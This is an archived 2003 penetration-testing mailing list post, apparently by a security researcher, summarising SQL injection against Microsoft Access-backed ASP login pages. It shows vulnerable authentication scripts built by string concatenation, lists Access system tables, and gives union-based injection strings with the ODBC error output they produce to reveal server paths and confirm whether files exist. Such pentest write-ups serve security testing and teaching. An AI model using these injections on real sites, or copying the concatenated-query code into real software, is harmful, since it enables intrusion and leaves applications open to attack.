Professional Documents
Culture Documents
Penetration Testing - Access SQL Injection
Penetration Testing - Access SQL Injection
Scanner
Penetration Testing mailing list archives
Intro
Ref Guide
Install Guide By Date By Thread
Download
Changelog
Book
Docs From: "Brett Moore" <brett.moore () security-assessment com>
Date: Mon, 19 May 2003 16:25:24 +1200
Security Lists
Nmap Announce
Nmap Dev ============================================================================
Bugtraq % Access SQL Injection
% brett.moore () security-assessment com
Full Disclosure ============================================================================
Pen Test
Basics Nothing new here, move along..
More
****************************************************************************
% MS Access system tables
Security Tools ****************************************************************************
Password audit MSysACEs
Sniffers MSysObjects
MSysQueries
Vuln scanners MSysRelationships
Web scanners
Wireless ****************************************************************************
Exploitation % MS Access command execution, (older versions only)
****************************************************************************
Packet crafters [Auth Page Script]
More
user = request("user")
Site News pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Advertising Set Rs = Server.CreateObject("ADODB.Recordset")
About/Contact Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
Sponsors: ' Access Denied
else
' Access Allowed
end if
****************************************************************************
% Auth Bypass, Basic
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
****************************************************************************
% Auth Bypass, Simple
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT user,pass FROM users where user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
if (rs("pass") = pass) then
' Access Allowed
else
' Access Denied
end if
end if
[Union Notes]
Remeber when using unions the sort order can affect the first record
returned.
****************************************************************************
% System Path Disclosure
****************************************************************************
[Sql String]
user = test' union select names from msysobjects in '.
[ODBC Response]
****************************************************************************
% Verify File Exists
****************************************************************************
[Sql String - non-existant file]
user = test' union select name from msysobjects in '\proof
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\proof.txt'.
****************************************************************************
% Verify Path Exists
****************************************************************************
[Sql String - non-existant path]
test' union select name from msysobjects in '\nopath\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid
path.
Make sure that the path name is spelled correctly and that you are
connected to the
server on which the file resides.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\inetpub\sqlerr'.
---------------------------------------------------------------------------
*** Wireless LAN Policies for Security & Management - NEW White Paper ***
Just like wired networks, wireless LANs require network security policies
that are enforced to protect WLANs from known vulnerabilities and threats.
Learn to design, implement and enforce WLAN security policies to lockdown enterprise WLANs.
Current thread:
Access SQL Injection Brett Moore (May 20)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]